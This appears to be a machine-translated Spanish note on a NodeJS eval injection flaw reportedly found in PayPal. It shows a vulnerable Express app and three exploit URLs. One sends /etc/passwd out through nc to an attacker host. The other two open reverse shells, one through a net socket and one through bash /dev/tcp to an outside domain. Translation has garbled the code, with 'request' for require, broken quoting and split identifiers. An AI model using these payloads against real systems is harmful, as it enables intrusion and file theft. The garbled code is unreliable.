fondo
@Artsploit Al cavar para PayPal, descubrió que se ejecutó un código NodeJS, recompensando $ 10,000.
prueba
var express = request ('express'); var app = express (); app.get ('/', function (req, res) {res.send ('hello eval (req.Query.q)); console.log (req.query.q);}); app.listen (8080, function () {console.log (' Ejemplo de escucha en el puerto 8080! ');});Leer cualquier archivo
http: // host: 8080/? Q = require ('child_process') .exec ('cat+/etc/passwd+|+nc+atacante+80')Get Shell
http: // host: 8080/? Q = var+net+=+require ("net"),+sh+=+require ("child_process") .exec ("/bin/bash"); var+client+=+new+net.sock et (); client.connect (80,+"atacante",+function () {client.pipe (sh.stdin); sh.stdout.pipe (cliente); sh.stderr.pipe (cliente);});Obtener shell2
http: // host: 8080/? Q = require ("child_process") .exec ('bash -c "bash -i>%26 /dev/tcp/wufeifei.com/7890 0>%261"')